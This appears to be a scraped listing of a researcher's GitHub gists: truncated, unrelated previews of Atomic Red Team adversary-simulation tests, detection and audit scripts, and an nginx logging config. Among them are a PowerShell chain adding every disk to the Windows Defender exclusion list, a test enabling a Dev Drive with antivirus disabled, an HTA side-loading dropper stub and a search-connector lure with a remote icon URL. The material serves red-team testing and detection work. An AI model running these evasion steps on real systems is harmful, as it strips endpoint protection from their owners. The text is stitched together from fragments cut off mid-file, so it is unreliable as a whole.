<html>
<head>
<title>Atomic Red Team - DLL Side-Loading HTA</title>
<HTA:APPLICATION ID="AtomicSideLoad" APPLICATIONNAME="AtomicSideLoad" BORDER="thin" BORDERSTYLE="normal" ICON="shell32.dll,4" >
<script language="VBScript">
Dim shell
Set shell = CreateObject("Wscript.Shell")
' Base64 encoded content of invite.zip - which is https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-1---dll-side-loading-using-the-notepad-gupexe-binary
Dim base64EncodedContent
@MHaggis
MHaggis / SlashAndGrab.ps1
Created February 27, 2024 14:33
Single Atomic Chain Reaction for Slash And Grab
## Chain Reaction
## Add all logical disks to Windows Defender exclusion list
Write-Output "Adding all logical disks to Windows Defender exclusion list"
foreach ($disk in Get-WmiObject Win32_Logicaldisk){
Add-MpPreference -ExclusionPath ($disk.deviceid + "\")
}
Start-Sleep -s 3
## Download and move a file to the startup folder
@MHaggis
MHaggis / SlashAndGrab.yaml
Last active February 27, 2024 14:48
Atomic Tests for Slash And Grab Post Exploitation - Some new, some old. Contribute to Atomic here https://github.com/redcanaryco/atomic-red-team/pulls
attack_technique: Many
display_name: Slash and Grab Post-Ex
atomic_tests:
- name: Add all logical disks to Windows Defender exclusion list
description: |
This test adds all logical disks on the system to the Windows Defender exclusion list.
supported_platforms:
- windows
executor:
command: |

STRT Attack Range Nginx.conf

The following is the base nginx.conf file utilized to proxy to applications. Note that the most important part is the logging key-value format, in which we log as much data as possible. This is CIM compliant and maps to the Splunk Web data model.

user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;

Modify, copy and paste the following with appropriate permissions to enable SACL object access auditing on the ScreenConnect directories or the App_Extensions directory.

# PowerShell script to enable auditing for event ID 4663 for all write operations to a specified path

# Define the path
$folderPath = "C:\Program Files (x86)\ScreenConnect\App_Extensions"

# Step 1: Enable Audit Policy
<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
<iconReference>imageres.dll,-1021</iconReference>
<description>invoice</description>
<isSearchOnlyItem>false</isSearchOnlyItem>
<includeInStartMenuScope>true</includeInStartMenuScope>
<iconReference>http://<somewhereanywhere>/icon.ico</iconReference>
<templateInfo>
<folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
</templateInfo>
@MHaggis
MHaggis / HVC_LOLDrivers_check_csv.ps1
Created November 21, 2023 02:44
Based on the Trail of Bits HVCI LOLDrivers check script - just outputs to CSV
<#
.SYNOPSIS
Compares the HVCI block list on the current system against the list of
vulnerable and malicious drivers from loldrivers.io
Company: Trail of Bits
Author: Michael Lin
Contributors: Yarden Shafir
License: Apache 2
@MHaggis
MHaggis / T1059.yaml
Created November 8, 2023 18:22
You will need to create the T1059 folder in the Atomics directory. Save this as a new yaml in that dir. A second folder under T1059 will be src. Place the au3 file there.
attack_technique: T1059
display_name: Command and Scripting Interpreter
atomic_tests:
- name: AutoIt Message Box Test with Download and Extract
description: |
Downloads AutoIt to the temporary directory, extracts it, and executes an AutoIt script that shows a message box.
supported_platforms:
- windows
input_arguments:
autoit_script_path:
- name: Enable Dev Drive With Disabled AV Using Fsutil
description: |
This test simulates an adversary enabling a Developer Drive using fsutil.exe with arguments that disable antivirus (AV) on the created drive.
This technique requires administrative privileges and is relevant for Windows 11 environments starting with Build #10.0.22621.2338 or later.
The execution of this command should be closely monitored and flagged in production environments.
Ref. https://x.com/0gtweet/status/1720419490519752955?s=20 and https://x.com/Kostastsale/status/1721271281705001306?s=20
supported_platforms:
- windows